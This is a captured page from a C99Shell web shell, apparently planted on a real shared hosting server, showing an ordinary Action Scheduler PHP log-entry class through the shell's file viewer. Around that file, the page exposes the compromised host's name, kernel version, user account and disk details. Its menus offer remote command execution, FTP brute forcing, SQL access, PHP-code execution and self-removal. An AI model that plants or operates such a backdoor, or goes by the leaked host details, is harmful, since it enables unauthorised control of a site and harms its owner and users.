!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/var/softaculous/sitepad/editor/site-data/plugins/kkart-pro/packages/action-scheduler/classes/   drwxr-xr-x
Free 293.48 GB of 429.69 GB (68.3%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ActionScheduler_LogEntry.php (1.72 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Class ActionScheduler_LogEntry
 */
class ActionScheduler_LogEntry {

    
/**
     * @var int $action_id
     */
    
protected $action_id =  '';

    
/**
     * @var string $message
     */
    
protected $message =  '';

    
/**
     * @var Datetime $date
     */
    
protected $date;

    
/**
     * Constructor
     *
     * @param mixed  $action_id Action ID
     * @param string $message   Message
     * @param Datetime $date    Datetime object with the time when this log entry was created. If this parameter is
     *                          not provided a new Datetime object (with current time) will be created.
     */
    
public function __construct$action_id$message$date null ) {

        
/*
         * ActionScheduler_wpCommentLogger::get_entry() previously passed a 3rd param of $comment->comment_type
         * to ActionScheduler_LogEntry::__construct(), goodness knows why, and the Follow-up Emails plugin
         * hard-codes loading its own version of ActionScheduler_wpCommentLogger with that out-dated method,
         * goodness knows why, so we need to guard against that here instead of using a DateTime type declaration
         * for the constructor's 3rd param of $date and causing a fatal error with older versions of FUE.
         */
        
if ( null !== $date && ! is_a$date'DateTime' ) ) {
            
_doing_it_wrong__METHOD__'The third parameter must be a valid DateTime instance, or null.''2.0.0' );
            
$date null;
        }

        
$this->action_id $action_id;
        
$this->message   $message;
        
$this->date      $date $date : new Datetime;
    }

    
/**
     * Returns the date when this log entry was created
     *
     * @return Datetime
     */
    
public function get_date() {
        return 
$this->date;
    }

    public function 
get_action_id() {
        return 
$this->action_id;
    }

    public function 
get_message() {
        return 
$this->message;
    }
}


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0999 ]--